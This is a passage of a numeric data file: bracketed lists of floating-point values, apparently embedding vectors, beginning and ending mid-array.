93,0.0332211,-0.0066531114,0.027762074,0.0159458,0.009272745,0.010144783,0.0678027,0.082084484,0.002507255,-0.04766641,0.03193876,-0.031452104,0.025193883,0.004577404,-0.043499753,-0.025995227,-0.021354543,-0.020759515,-0.035443254,-0.029917844,0.02535344,-0.022869674,0.033143423,-0.011265493,-0.089886546,-0.059128307,-0.006308649,0.024478298,-0.008678198,0.007328537,-0.0070887804,-0.025078105,0.040001012,0.035026312,-0.015610299,0.004660282,0.043577094,0.0041018445,0.025904704,-0.008451986,0.008216156,-0.050725676,-0.0075710183,-0.0021159535,-0.058062896,-0.01848449,0.021105507,-0.0029079146,0.005245667,-0.01180699,-0.02276091,0.041568328,-0.0057413476,-0.0051483624,-0.05875514,0.06032515,-0.007928953,0.024617098,0.0014526887,0.018909985,0.022892995,-0.012650078,-0.03428643,0.01201526,-0.026119422,0.012600172,-0.00073429814,0.012131607,0.0126157515,0.055894893,0.0011850746,0.06838529,0.005790855,0.019382909,-0.0012067831,0.04776906,0.045027837,0.029180346,-0.0221473,0.024091525,-0.017474046,-0.006433559,-0.00004350798,-0.0032162375,0.035461504,-0.028839888,-0.003954304,-0.031922493,-0.07465154,0.037817225,0.02995896,-0.015515175,-0.075688526,0.008247334,-0.026675817,-0.036096875,-0.012845938,0.022541037,-0.026452068,-0.0019014444,-0.023988469,0.004005514,-0.018316796,0.046337914,0.01881056,-0.041681435,0.07328946,-0.03681027,-0.004345594,0.059567936,-0.023993276,-0.030571256,-0.021124598,0.041413892,0.06794052,0.008475304,0.026117343,-0.030687904,0.008226297,0.020986121,-0.035439644,-0.06416257,-0.04431588,-0.031255044],[0.0036888544,0.007427091,-0.13892907,-0.00462225,0.08608189,-0.06901358,0.02349515,0.007830925,-0.0013142271,-0.0686576,-0.02521064,0.04995725,0.030539334,0.011266179,0.005457071,-0.063595615,0.021685835,-0.030609677,-0.015097938,0.030164063,0.0033587003,-0.043879453,-0.002528467,-0.061697423,0.09048472,0.040458728,0.024259979,-0.002011845,-0.0007357947,0.02846898,-0.0013482417,-0.03115216,-0.05872647,-0.0014468395,-0.052447386,-0.06801064,-0.0081553105,0.005222219,-0.049680974,0.0094503835,0.00084784033,0.016300915,0.026973387,-0.07768484,0.005993809,0.0011928554,0.013295552,0.031435333,0.05567369,-0.11858877,-0.002248835,-0.009427146,-0.0107636675,-0.047810946,0.0914203,0.009390215,0.0360403,0.022141553,-0.012740293,-0.043760236,0.111128315,0.08695456,-0.009102141,0.023413839,0.0481029,-0.012880306,-0.017802179,0.029003097,0.029673053,0.024039049,0.022084754,-0.05532864,-0.0030147913,-0.020938346,-0.0011839845,-0.032970212,-0.03376378,-0.077165306,0.02400978,0.0056372746,-0.003858443,-0.015874572,0.06304625,-0.02946121,0.007429125,0.03811017,-0.027187234,-0.02846763,-0.03469897,0.023924788,0.01535154,-0.002826389,-0.014381192,0.04255736,-0.058114383,0.0034886796,0.03865733,0.014471103,0.0046959026,-0.01992044,0.0021835507,0.019992156,0.005471593,-0.014277356,-0.009329798,0.025943493,0.019878024,0.02371903,0.030926201,0.051812023,0.023325326,0.050352685,0.028388325,-0.014605399,0.032033764,-0.022092266,0.045145735,-0.028322382,0.0066935737,0.057149798,-0.022576747,-0.05010923,-0.010082371,0.052982066,0.015624979,0.0030428248,-0.06208067,0.009435933,0.0034376683,-0.068364,-0.010428581,0.022441965,-0.034891073,0.00091437803,0.039047487,0.035303466,-0.055762295,-0.065697744,0.036953628,-0.0044319336,0.007659212,0.039607085,0.019183405,-0.046531033,-0.015785357,-0.019019296,-0.035618775,-0.0059838975,-0.033377346,0.007886334,-0.03900173,0.037901256,0.01408367,0.0051461332,0.022118513,0.000023247736,0.006935924,0.018297452,0.0103422925,0.06466883,0.016423626,0.061385445,-0.025979457,0.040697,-0.041072417,-0.049619913,-0.0009512705,0.08039848,-0.029609593,-0.01406128,-0.048914615,-0.050190885,-0.005976378,-0.005139627,-0.019306293,-0.027995871,0.042989083,-0.021704262,0.0428137,-0.06766728,0.0048104366,-0.08162498,0.040893625,0.025764484,-0.05520193,-0.0023986998,0.016075682,-0.04936209,-0.01705513,-0.00059928,0.00537524,-0.025788348,-0.03719506,0.024147468,-0.04622697,-0.07077256,-0.012560483,0.0009356185,0.06373156,0.015747022,-0.052742653,-0.0124514885,0.0026589634,-0.00014570274,-0.053999804,0.061733384,-0.012806805,0.0006420774,-0.015119533,0.030056383,0.09374255,-0.043764777,-0.00852727,-0.037986685,0.007856823,-0.038065646,0.0020454803,-0.03488173,-0.078000166,0.025897898,0.02098896,0.0050352905,0.031434312,-0.008803751,0.015553677,0.03371789,-0.007904091,0.016406253,0.03796279,-0.009784224,-0.039000988,-0.06507857,0.050662953,0.054146737,-0.008850897,0.038607895,-0.009000021,0.06766415,0.0038505814,0.022042954,0.009434794,0.01922712,-0.021491613,-0.012584079,-0.010503436,0.0065936227,-0.038716834,-0.012503472,-0.018878063,-0.0007738718,-0.017626852,0.0038579034,0.0048642084,0.041093197,0.07533425,-0.09876985,-0.025485586,0.0035819544,0.033243947,0.013440378,0.010774107,0.018351614,-0.011407486,-0.046601363,0.019284515,-0.029354852,-0.0529454,0.05847513,0.04720018,0.006758606,-0.0068246955,0.041777153,0.078855656,0.07034429,-0.03048216,-0.022033399,0.050865397,0.003926624,-0.028194198,0.030952109,-0.054075427,0.029196732,0.013921125,0.025447913,-0.008930874,-0.03285496,0.014418355,-0.0035619007,0.004658922,-0.03438072,0.059169117,-0.047549196,-0.021173837,0.040250998,-0.014461759,-0.00787241,0.05514214,-0.00009619341,0.0071827285,-0.026921317,0.05933165,0.06005669,0.03136206,0.060237266,-0.010803865,-0.008521287,0.03288873,0.042748142,-0.007819921,-0.0061723846,-0.022029685,0.033401493,-0.021165358,0.029678583,-0.01850574,0.014365429,0.028243806,0.0038786202,0.010273141,-0.02224457,-0.000088976296,-0.010567992,-0.014108156,-0.02845748,-0.022000467,0.0444499,-0.052352205,-0.002001278,-0.013714311,-0.06626656,0.01853383,0.04029111,0.040647943,-0.05112557,-0.025877163,0.027789854,0.022297947,0.0416859,0.0179132,0.035641458,0.03660119,-0.046523467,0.015899211,-0.00965839,-0.022789018,0.04217494,-0.026176859,-0.010377281,0.024953902,0.031849753,-0.039226107,0.036374822,-0.037677977,-0.018171767,0.019596606,-0.013473037,-0.0064485907,0.016465109,0.004829072,0.006711471,0.043309603,0.0073801447,-0.039452914,0.015274391,0.021497801,0.09159291,0.028213909,0.014415113,-0.008328556,0.0027783713,-0.06347592,0.0006744989,0.04418169,0.0059284484,0.000040158215,0.028830238,-0.07187265,0.013915175,0.013646565,-0.021163011,-0.017219665,-0.07186698,-0.026353301,0.019636963,0.02396047,-0.028637,0.036922917,-0.026282096,0.0019640415,0.019737154,-0.004379553,-0.060430065,-0.009460715,0.043857757,0.021432323,-0.022534618,-0.0120990975,-0.029276166,0.02719649,0.030028187,-0.028910246,-0.079878874,0.008873273,-0.0049339975,-0.010346893,0.017233344,-0.007106431,-0.037418805,0.07855498,0.009583166,0.0882111,-0.022750348,-0.019038571,-0.058382962,0.004510224,0.027536716,0.037496455,-0.008893057,-0.0068183234,0.038681712,-0.0279581,0.0053898976,-0.0008099045,-0.023417639,-0.0010610744,-0.005173759,0.019770667,0.06464789,0.030501276,-0.03516677,0.0038221,0.024579031,0.06860404,-0.0095909685,0.028812349,-0.023930699,0.028721312,0.030755106,-0.022182573,0.02628404,0.03686933,-0.004602362,-0.076636605,-0.04644888,-0.018131094,0.07294783,0.10977834,-0.044781312,-0.04629978,0.0030234817,-0.0007226099,0.010549134,-0.014095874,0.002838916,0.094689764,0.014219709,0.027515259,-0.031675253,-0.0153636485,0.035902146,0.002577853,0.0020905659,-0.01793091,-0.0035874897,0.032338947,0.05638391,-0.017832542,-0.047848426,0.040013928,0.097203486,-0.05616469,0.015818097,0.031037232,-0.034236874,0.014941233,0.034752775,-0.03079563,0.021895152,-0.01241577,0.059342235,-0.02610559,-0.021767749,-0.03581085,-0.056133963,-0.030434044,0.007307026,0.0020212482,-0.020691931,0.012293764,0.002441674,0.039324444,0.017579226,-0.0011347795,0.017484074,0.019327713,-0.036084093,-0.017294547,0.016751017,-0.001245274,-0.015529569,0.05036928,0.011885041,-0.052057616,0.03810177,0.024767183,-0.032488707,0.046841238,-0.04925214,-0.045520872,-0.054991625,-0.0026690708,-0.0153386025,0.019298615,0.008839708,0.0230174,-0.04092014,0.0013123007,-0.011276669,-0.09137212,0.0015916158,0.019252708,-0.020941373,0.0032270462,0.016151862,-0.05155986,0.019110285,0.03128997,-0.03098899,0.01410665,0.012827134,-0.002964084,0.013014805,-0.082923554,-0.018205175,0.06647961,-0.01693563,-0.028924767,0.038705986,0.013935094,-0.003351948,0.022482118,-0.002038838,0.014536163,-0.03697582,-0.021043427,-0.02687035,-0.004894256,0.0749182,-0.011395847,-0.029037345,0.056624144,-0.07971853,0.015357108,-0.0105922455,0.033880427,0.0029365725,0.049836252,0.006200011,-0.044615235,-0.03294294,-0.034189645,-0.011868781,0.029158486,0.011945283,0.017118603,-0.053870093,-0.02820316,0.030487811,-0.009417398,0.074228935,-0.031311035,-0.046223182,-0.047754012,-0.0033277157,-0.008956355,0.024733715,0.0038125447,0.0012488356,-0.058693394,-0.019789059,0.047942027,-0.0110871745,0.028941825,0.056621242,0.0037725535,0.00172908,-0.03652973,-0.06679848,0.060459755,-0.044334386,-0.031251006,0.01974742,0.013944371,0.031614535,0.008773634,0.035687543,-0.003339305,-0.0051502953,-0.013025232,-0.038801137,0.022042379,0.004615099,0.016455723,-0.013199167,-0.018778779,0.047870502,0.0056568026,-0.014821541,0.0013659964,-0.03814752,0.033221617,0.008043071,-0.00842132,0.012964001,0.011833201,-0.032649744,0.019837862,-0.029774481,0.007727226,-0.008797901,0.014110604,-0.013134285,0.0040694308,-0.03620999,0.032759357,-0.009019362,0.014621782,-0.037038017,-0.009424021,0.054691877,-0.08680303,0.013743826,-0.04191718,-0.031275097,-0.10854145,0.014513011,-0.004697172,0.034729145,-0.030306557,0.02241567,0.049585916,0.016439464,0.03213085,0.033519257,0.02923819,-0.038308367,0.015886238,0.025201863,0.0890101,0.007144645,0.04407457,0.046842806,0.0011119117,-0.0223778,0.05635007,-0.064664245,-0.013924249,-0.02819329,-0.064411245,-0.06543163,0.008322843,-0.019340353,-0.027616458,-0.026733872,0.031099377,-0.016539462,0.0057510985,0.013823809,-0.050857816,-0.04294508,0.0030208712,0.053460706,0.018527301,-0.043125834,0.010905067,-0.004364411,0.08939186,-0.0007304808,0.0012504907,-0.019809462,-0.0055842344,-0.038110957,0.033514924,-0.031161888,0.04908805,-0.037341114,0.033123862,-0.0023663435,-0.07731512,-0.04937078,0.007091308,-0.044402156,-0.0066648326,-0.048596237,0.023958467,0.024863848,-0.027524844,-0.018332364,-0.054581903,0.061718374,-0.027320398,0.016935298,0.022882339,0.055083677,0.02878365,0.0017052069,0.009624605,-0.013805394,-0.019254586,0.012915221,-0.044380456,0.0008894851,-0.000014529286,0.038817704,0.024127088,0.0111693395,-0.014375956,-0.005773469,0.0494682,0.045209475,0.032231353,0.024862368,-0.044147335,0.011830013,-0.0067825965,0.0060153184,0.051315278,-0.02755069,0.034325466,-0.0379609,-0.014047735,-0.02030442,-0.016342813,0.04145672,0.005927978,-0.055002667,-0.041870702,-0.057403542,-0.0794552,-0.0086407345,-0.018671317,-0.00007995373,-0.042412855,0.011657185,0.032612734,0.023935396,-0.024183298,0.030229071,0.018623672,-0.01703561,0.09663863,0.04088883,-0.00029330997,0.034692716,-0.021129914,-0.018451875,0.025355978,-0.0012924536,0.06696151,0.025165377,0.022834705,-0.022860719,0.0018855846,0.00435213,-0.03440269,-0.093300074,-0.04047628,-0.010984265],[-0.0013139794,0.04257616,-0.14792739,-0.05986544,0.08717374,-0.08533374,-0.010054825,0.00095631677,0.00932064,-0.05446231,-0.028432155,0.049658176,0.052701205,-0.024838947,-0.012320784,-0.0629881,0.015464662,-0.029809624,-0.040871415,0.0029185403,0.017694937,-0.072233275,0.03875162,-0.07036544,0.107278556,0.028140446,0.040102392,-0.006961497,-0.026906064,0.0066747623,-0.01529177,-0.035216015,-0.04064253,-0.0014094891,-0.054561418,-0.07307298,0.010416213,-0.03405526,-0.051246755,-0.00028276202,-0.014283898,0.013414934,0.017225882,-0.04399441,0.00984399,0.0016636328,0.052543078,0.005772358,0.04144949,-0.117206976,0.029809214,-0.0107883485,-0.0024950341,-0.039224956,0.10848378,0.013243866,0.039511528,0.0007462334,-0.031772733,-0.015754607,0.102381535,0.09161956,-0.040548135,0.05294383,0.047992345,-0.011259349,-0.04679068,0.030959003,0.026159815,-0.0029035024,0.00109888,-0.05012073,0.015248485,-0.0043098154,-0.01072221,-0.012438827,0.0043426105,-0.055235147,-0.016388783,0.063046746,0.0047560697,-0.05241574,0.03900161,-0.030530198,0.019022832,-0.012576748,-0.026197191,-0.012438219,-0.019939017,0.022519754,0.00842162,-0.016275425,-0.0133767035,0.025041806,-0.051996794,0.024285175,0.005457327,0.031945568,-0.035010204,-0.02632465,-0.022185724,0.009537576,0.024551444,-0.04691919,0.019137314,0.032856442,0.037992302,0.01760692,0.02058823,-0.006333615,0.0012724149,0.05297872,0.031619333,-0.02344735,0.040087026,-0.039743584,-0.0040994133,0.0036656405,0.02106917,0.089377865,-0.022667643,-0.044567123,-0.017729403,0.049437255,0.02154391,-0.015699701,-0.056740433,0.023795264,-0.013096019,-0.077882975,0.0033676527,-0.007688121,-0.083854675,-0.0053627724,0.018051105,0.009129384,-0.040349983,-0.07687617,0.046181176,-0.010420001,0.038709667,0.034658343,0.004500645,-0.027962215,-0.061063856,-0.027536387,-0.019315071,-0.0039791767,-0.051061418,-0.009705493,-0.04953706,0.05339996,0.0099830115,0.026425036,0.021218406,0.0062236153,0.012665901,-0.005707917,0.01580851,0.043278947,0.010303662,0.019766927,-0.022068057,0.066069864,-0.015695812,-0.049535085,0.01302783,0.078557536,-0.015469489,0.019641848,-0.04860182,-0.031205537,-0.016668683,-0.006910544,0.0018605321,0.026011404,0.026563134,-0.03608245,0.03759561,-0.045072094,0.02806569,-0.077329636,0.045583338,-0.027860742,-0.046482902,0.03420413,0.00045956502,-0.03107495,-0.0011109663,-0.050492477,0.016164068,-0.00092784234,-0.054209836,-0.0069141323,-0.029428424,-0.04712583,-0.0130683435,-0.028398396,0.034760896,-0.011728247,-0.05969287,0.008294724,0.0024044598,-0.0010502611,-0.04038499,0.060327537,-0.028286338,0.035150737,-0.00534591,0.02360834,0.080641,-0.044561233,-0.0058067013,-0.0042938623,-0.004892877,0.010676027,0.026386116,-0.027571384,-0.04823531,0.03820089,0.044446424,0.0033319546,0.043363877,0.009105518,0.052771367,0.01987921,-0.03501871,-0.0024527109,0.012425541,-0.01679616,-0.01793452,-0.076718874,0.017613038,0.016023379,-0.016519584,0.038514853,0.004468437,0.0780038,0.011982687,-0.0134912245,0.020645095,0.032078717,-0.0041452665,0.0036456494,-0.03675405,0.009737923,-0.025927061,0.00020565848,-0.01529789,0.0026593914,-0.00001485568,-0.01684942,-0.0049450276,0.023413762,0.058091786,-0.05989598,0.0184765,0.017097639,0.0025707916,-0.030575894,0.008581959,-0.03340317,-0.006812626,-0.04545706,-0.019667445,-0.029288057,-0.058448352,0.04367329,0.0059080534,0.036587957,-0.00013241863,0.015357736,0.064210735,0.024885604,0.007701075,0.0034199518,0.036863342,-0.025408598,-0.015686752,-0.005102264,-0.081771255,-0.0062011452,0.011706476,-0.0041258154,-0.0008885164,-0.0041283653,-0.029170107,0.010556513,0.004538266,-0.03874761,0.053163607,-0.046448488,-0.018494513,0.021922916,-0.039329566,0.010003108,0.053317998,-0.005294518,0.021846607,-0.037648883,0.040519502,0.07683473,0.03877418,0.05833059,0.0025461088,-0.0028730296,0.00398006,0.02131347,0.03371328,0.010788935,-0.029581558,0.0031837195,0.0012398665,0.0519714,-0.043092977,0.028105877,0.046675555,0.0029894623,0.04703477,0.00788729,-0.0047245556,-0.038421053,0.011835983,-0.033695757,0.000010596188,0.06358764,-0.01496678,0.0008068133,0.0046093017,-0.04815797,0.02354212,0.01025797,0.013997379,-0.048250668,-0.06853056,0.02324201,0.041107487,0.021564614,0.0048743864,0.04883003,0.022677036,-0.06616117,0.02767291,-0.02793033,-0.03853556,0.031398453,-0.006101508,-0.036789957,0.044018634,0.0061285775,-0.036436748,0.058640074,-0.02634984,-0.01625598,0.028753573,-0.036099594,0.011964847,0.03555304,0.017003678,-0.0032627236,0.060883686,0.026590535,0.0042401534,-0.004536051,0.013805135,0.039829396,0.0469716,-0.009350843,-0.005910268,-0.0071223886,-0.05130144,0.015558199,0.022944674,0.028753007,-0.013237628,-0.026956754,-0.07759369,0.015224141,0.008274426,-0.010133757,0.010783981,-0.07003451,-0.009978106,0.031067772,0.016120903,-0.0025562195,0.046630394,0.018353336,-0.016371977,-0.0043445854,0.024334218,-0.0400031,-0.0017027251,0.03729242,0.04990469,-0.008338568,0.032935,-0.019846836,-0.024305876,0.034887087,-0.036479667,-0.09381717,0.02605621,-0.032399792,0.0010407496,-0.017751358,-0.042742826,-0.022645885,0.071810246,0.013921633,0.040487126,-0.01688568,-0.0002944705,-0.04369825,0.048310734,0.018409776,0.05245411,0.008905751,-0.03515952,-0.010459862,-0.012924813,0.02998476,0.03813437,-0.0025979998,0.012894052,0.028118819,0.027279334,0.07221245,0.023822343,-0.06678935,0.030419944,0.05845904,0.04086184,-0.023452884,0.00022074228,-0.024565414,0.008011531,0.030230016,0.015709745,0.04825509,0.03543729,0.012662563,-0.07382702,-0.04672821,0.0014539056,0.105059616,0.08280561,-0.034535322,-0.030881276,0.036666736,-0.0046978844,0.0036413323,-0.0057145315,-0.009889983,0.09957975,0.010230062,0.028993586,-0.033416674,0.021643223,0.010849595,-0.002365939,0.016443081,-0.07329189,-0.007040548,0.004346432,0.034421798,-0.0042688455,-0.035599183,0.060488362,0.09382754,-0.06500972,-0.004908714,0.006914954,-0.04463122,0.054331187,0.028439518,-0.0016467598,0.007154302,-0.024983596,0.05745099,0.013213224,-0.02258205,-0.04216243,-0.044902742,-0.0151085425,0.016488072,0.022587901,-0.014548605,0.0007404857,0.00702991,0.0019131611,-0.008879983,0.02063321,0.029798554,0.0026585434,-0.03940292,-0.01278815,0.011575963,-0.0022990606,-0.009216358,0.075971685,0.028046874,-0.041008577,0.026932891,0.025557904,-0.013800155,0.054148212,-0.008880579,-0.042585682,-0.031997677,0.022546314,-0.029400215,0.037840936,-0.0068299132,0.059118822,-0.025565883,0.019209223,-0.017058099,-0.039896946,-0.0021021464,0.008468136,-0.01655246,-0.0074494565,-0.029625446,-0.028756415,0.042066205,0.011085365,0.0021789747,0.03794039,-0.039520998,0.010910481,-0.014889595,-0.058820426,-0.025622452,0.07242673,-0.043887928,-0.057332918,0.04366825,0.03425567,0.007274614,0.029205736,0.0011741369,0.053981796,-0.024485253,-0.0045778803,-0.04335215,0.015487122,0.045626584,-0.026919246,-0.02928114,0.03720954,-0.060631625,0.008503093,-0.037726093,0.026425691,-0.0012309785,0.01907872,0.027597757,-0.008159524,-0.049766067,-0.015362408,-0.0026607793,0.038302083,0.036589317,0.002009606,-0.030297251,-0.03807659,-0.015377716,0.003846886,0.062151857,-0.014040949,-0.044161126,-0.036107894,-0.0010504669,0.011582737,0.018307583,0.034479197,0.009734923,-0.08115728,-0.017253123,0.048142053,-0.036527347,0.031488046,0.040339973,-0.0040182997,0.01346629,-0.014918628,-0.061314117,0.009716326,-0.04064857,-0.044580493,-0.0025647364,0.053171936,-0.009129785,-0.016867861,0.0201325,0.006827387,0.0011054622,-0.024310479,-0.01972569,0.016504684,-0.00051428,0.04885785,-0.014209491,-0.023202596,0.03684673,-0.0046718125,0.0006745289,-0.008068461,-0.027918683,0.018342532,0.008399867,-0.03996631,-0.00837329,0.007909148,-0.06342811,0.048688117,-0.0005829947,0.00038091687,-0.025505023,-0.011975903,-0.048437875,0.04026566,-0.030698786,0.059246074,-0.009454503,-0.009847435,-0.015020924,-0.0005865598,0.034840155,-0.060924187,0.027369926,-0.06712631,-0.025186585,-0.11092932,0.0435129,-0.016425954,0.044947337,-0.008564671,0.036395736,0.07846989,-0.0057205693,-0.01428473,0.014384784,0.015261582,-0.041232415,0.017664097,0.07754824,0.05837245,0.018534875,0.07498467,0.03898061,0.013727629,-0.02011745,0.03140035,-0.043130428,-0.0026805885,-0.03847618,-0.067989066,-0.029414037,-0.0113853095,0.010243936,-0.027896546,-0.034296602,0.050981674,-0.00004537332,-0.021400172,0.04270702,-0.0620472,-0.047016196,0.0035241684,0.052884076,-0.00018085194,-0.008459654,0.02531579,-0.0024581961,0.09205653,0.013475748,-0.018420268,-0.04063361,-0.0021283703,-0.020454945,0.049046002,-0.015631944,0.019627282,-0.030483874,0.012597242,-0.011309944,-0.06838853,-0.046239737,0.018235411,-0.0007294505,0.015485656,-0.0145073235,0.014682427,0.036142174,-0.040262893,-0.023317553,-0.050352603,0.060488015,-0.008962412,0.026786797,0.04083178,0.0329055,-0.0034842684,0.019218815,-0.007558411,-0.007274792,0.0014898693,-0.039511647,-0.04310338,0.0062865834,-0.0270465,0.04057563,0.00069001695,0.026165599,0.011922809,-0.0121564325,0.017885266,0.025063245,0.037598025,-0.01017376,-0.03983298,0.04967447,0.012694865,-0.0035431737,0.027823796,-0.020456295,0.017218981,-0.029426722,0.00844277,-0.011512625,-0.047648046,0.024537824,0.0017088067,-0.014618936,-0.03915153,-0.07023047,-0.052046165,-0.012625588,0.014780212,0.011060945,-0.041147135,0.034920957,-0.023528358,-0.0066869776,-0.046329997,0.007999824,0.041868467,-0.041363608,0.08852359,0.017763523,-0.019525839,0.045830313,-0.017621703,-0.02861194,0.032650232,0.019988323,0.07504869,0.032668278,0.051753927,-0.032222863,0.005823185,0.001834273,-0.039649732,-0.08248999,-0.044270102,-0.028470594],[0.06691918,0.0088389,-0.15533917,-0.045076095,0.08720533,-0.041594386,-0.0021896146,0.028298216,0.029714236,-0.08044899,-0.040561866,0.019379014,0.05778922,-0.039119266,-0.0015257916,-0.036640406,0.022375638,-0.085220136,-0.009573977,0.0044803303,-0.012041054,-0.11784902,0.0126592545,-0.063634366,0.06715134,0.033080626,0.020108825,0.007464628,-0.071776845,-0.00075761654,-0.00856422,0.004057596,-0.06289932,-0.016008986,-0.047271874,-0.037670683,0.01087155,-0.030006643,-0.069240175,0.07007697,0.032404006,0.05899063,0.013323864,-0.040376205,0.0655102,0.033315398,0.05624716,0.0356699,0.057682544,-0.062613405,-0.01923163,-0.040364735,0.0063658776,-0.026688837,0.08288841,-0.0061607654,0.026430344,0.072360694,-0.012387361,-0.039889198,0.10206596,0.07502858,-0.032613732,0.0139967445,0.048937164,-0.036068898,-0.044633683,0.036568537,0.031498536,-0.0025353325,0.040512133,0.0035433373,0.0039265202,-0.01597348,-0.025505062,-0.008780939,-0.045298237,-0.07800639,-0.025535386,0.028007524,0.029061273,-0.02876036,0.016639397,-0.01985254,0.06644452,-0.0026479969,-0.046445068,0.009582474,-0.013482524,0.049700797,-0.028984524,-0.03404971,0.04345636,0.041264694,-0.05592491,-0.0070356936,0.017419983,0.04726928,-0.026469383,-0.010470897,-0.022645526,0.01911134,0.002760789,0.015229555,-0.033235017,0.06951674,-0.025318468,0.022081548,0.026131192,-0.0008536578,-0.0022372333,0.03509726,-0.038014542,-0.0032805735,0.054051697,-0.0054773926,0.055548206,-0.0126987165,0.0074261106,0.0698737,-0.019291667,-0.0151712,-0.029140104,0.0403713,0.07442635,0.009048167,-0.061131243,0.04092186,0.0038886624,-0.046399854,0.0020707326,-0.033216313,-0.058113597,0.0021874977,0.0052972357,0.038287885,-0.06584081,-0.049049933,0.03730653,0.0022363223,0.033904243,0.037122115,0.008298411,-0.0215551,-0.013069045,0.011595893,-0.016789751,0.0013311538,-0.0514457,0.018936472,-0.01079263,0.0070520244,0.0026733002,-0.032776013,0.03815433,-0.03155675,-0.0088248635,0.04111511,0.021119475,0.07637143,0.003941224,0.004749894,-0.038747605,0.06197924,-0.00914257,-0.018830186,-0.019816918,0.08084557,-0.035040848,0.030496106,-0.036239646,-0.01876979,-0.020363467,-0.017400615,-0.020894252,-0.000052113737,0.013327888,-0.040189784,0.011277779,-0.059056453,-0.014995638,-0.036214296,0.016242594,0.00053077383,-0.044078123,-0.02770552,0.015293901,-0.009919915,0.008141884,-0.058518186,-0.0011560058,-0.048706014,-0.042793564,-0.009303783,-0.022674508,-0.02421562,0.031793058,-0.035294943,0.02532237,0.011101193,-0.03634278,-0.020351423,0.026695635,-0.026837377,-0.09861783,0.047312222,-0.006413294,0.029382331,0.01880574,-0.015752401,0.10593834,-0.032745916,-0.0067829653,-0.031612866,-0.011358788,0.009189003,-0.008110157,-0.027611466,-0.09173343,0.026570225,0.043146577,-0.010088139,0.018894715,0.0025364554,0.020468194,0.016293723,-0.06406445,-0.003862132,0.029491864,-0.032787744,-0.0038494556,-0.06582728,0.045702223,0.03202045,0.007875631,0.051711958,-0.014346014,0.07261367,-0.013647477,0.014567805,-0.009287129,0.031035097,-0.0066566113,0.017337168,-0.058114477,0.006499007,-0.04024768,0.0065366873,0.014113661,0.024903953,-0.008574546,0.0012685953,0.043234084,0.034792777,0.040511336,-0.07068007,-0.019265858,0.015321901,-0.009362845,-0.023178343,0.04089379,-0.02495008,0.016759554,-0.08098126,-0.022160279,-0.05400929,-0.069008574,0.019367956,0.015076313,0.041983437,0.016419683,0.035630193,0.033289026,0.05431185,-0.006411396,-0.03279785,0.00096242543,-0.022360496,0.005270803,0.014457094,-0.042806413,0.0099248905,-0.031598818,0.024963478,-0.000093381386,-0.0014988203,-0.019124055,-0.0032291983,-0.028979957,-0.055773262,0.046620224,-0.024746122,-0.04785076,0.019232607,-0.00786707,-0.0049184104,0.046593387,-0.02170351,0.02595721,0.008993938,0.03831548,0.04951483,0.04128692,-0.00742174,-0.02437177,-0.0081343325,0.0335191,0.013464311,0.032720473,0.0056306287,-0.030395128,0.013610854,0.024045771,0.06822055,-0.04226385,0.015110257,0.02906738,0.013540015,0.012736947,0.008452711,-0.014453732,-0.015269423,-0.024266722,-0.0032469397,-0.01162458,0.027989874,-0.03233246,0.013876542,-0.008710633,-0.036484227,0.027564123,0.012498883,0.017969524,-0.07209875,-0.034370013,0.015525919,-0.031244064,0.011560729,0.01187956,0.02189984,0.012692339,-0.046416815,-0.009948841,-0.027960684,-0.025874972,0.05292206,-0.036550146,0.0043525146,0.044592377,0.008799836,-0.028326472,0.012640345,-0.023904847,0.0020641345,0.020932121,-0.044625986,-0.025440281,0.048136905,-0.009212807,0.0104711475,0.05600625,0.04610252,0.0033039723,-0.013905783,0.0036031697,0.058017254,0.020032031,0.004084156,0.0026248223,0.04723247,0.010753853,-0.014684136,0.0017932181,0.03109674,0.020061504,0.035810113,-0.064665705,0.033319715,-0.021163128,0.018736761,0.0015036733,-0.038432054,0.025686579,0.024808064,0.006504773,-0.0006380414,0.034990292,-0.005807238,-0.004079703,0.027808484,0.02327633,-0.013664269,-0.03278313,0.044391852,0.060634963,-0.039393824,-0.020279342,-0.03109835,0.0062433346,0.038169812,-0.016650025,-0.06013779,0.057761207,-0.010218241,-0.026304126,0.016695011,-0.011946763,-0.025213473,0.076232895,-0.023284104,0.024901949,-0.013143109,0.0076069036,-0.06297146,0.04531339,0.011265083,0.06612676,-0.0013814443,-0.03275975,-0.0096257115,0.014450637,0.017875573,0.0015280113,-0.011174298,-0.02656669,0.014070984,0.018413493,0.031137299,0.017847514,-0.08672511,0.036087688,0.062151767,0.015003946,0.0037319202,-0.0055194837,-0.014726965,0.03652049,0.026162732,0.0047279075,0.040422637,0.04046925,-0.029474804,-0.03443172,-0.027099676,-0.0071927565,0.086868405,0.095286615,-0.045943648,-0.05840712,0.07504459,-0.030935356,0.026846526,-0.03558677,0.013959545,0.07711831,-0.0066450415,0.06529109,-0.015642827,-0.009112144,0.049554612,0.007354199,0.0178184,-0.018381655,-0.019729126,0.034650613,0.019848758,0.016513895,-0.07192063,0.031421047,0.052641965,-0.077226125,0.032472145,0.013755612,-0.019963944,0.0376868,0.0036611538,-0.032879394,0.02233614,-0.051671505,0.048509944,-0.017041614,-0.034066916,-0.05217874,-0.06510767,-0.0005051393,-0.008174502,0.008779915,-0.0010604375,0.010489995,-0.004446652,0.034808315,0.031760857,-0.005297187,0.028533835,-0.0027685468,-0.00684135,-0.028179223,-0.0050167013,0.055931844,0.0049148006,0.071839154,0.019867303,-0.06625758,0.03282356,0.011040099,0.0054810387,0.04811167,-0.049807318,-0.02349839,-0.05401075,-0.02317375,-0.007879171,0.053658787,-0.0052958596,0.04634814,-0.012611118,-0.005832129,0.01631203,-0.0496727,-0.00009184577,0.010607613,-0.011666173,-0.040293187,-0.0052125747,-0.05486408,0.015579753,-0.026979323,-0.0267078,-0.008715935,-0.042738702,-0.0016946082,0.034735292,-0.039074015,-0.042649947,0.051483028,-0.045827698,-0.015890663,0.008827062,0.0008699051,0.02331208,-0.00530738,0.018055923,0.013066165,0.0035147956,-0.011212345,-0.039668787,0.018921409,0.038514286,0.008400145,-0.02273972,0.05132448,-0.06917057,0.030032124,-0.0063575385,0.041630667,-0.018240925,0.030675728,0.014787192,-0.049657084,-0.03436792,-0.009591034,0.031016797,-0.00207135,0.005552817,0.012786905,-0.06306028,-0.022364404,0.006329429,0.003788684,0.020198409,-0.030974464,-0.024487518,-0.06158722,-0.018785747,-0.041568026,0.033043385,0.021351544,-0.018105838,-0.040991295,-0.030287117,0.050546844,-0.004712435,0.06268864,0.077573776,0.028942693,-0.020315599,-0.04881406,-0.012317784,0.07849099,-0.041478176,-0.042796396,0.014851466,0.036788628,-0.032892086,-0.022309063,0.04085834,-0.031098077,-0.029368522,-0.005860075,-0.027581837,0.015369966,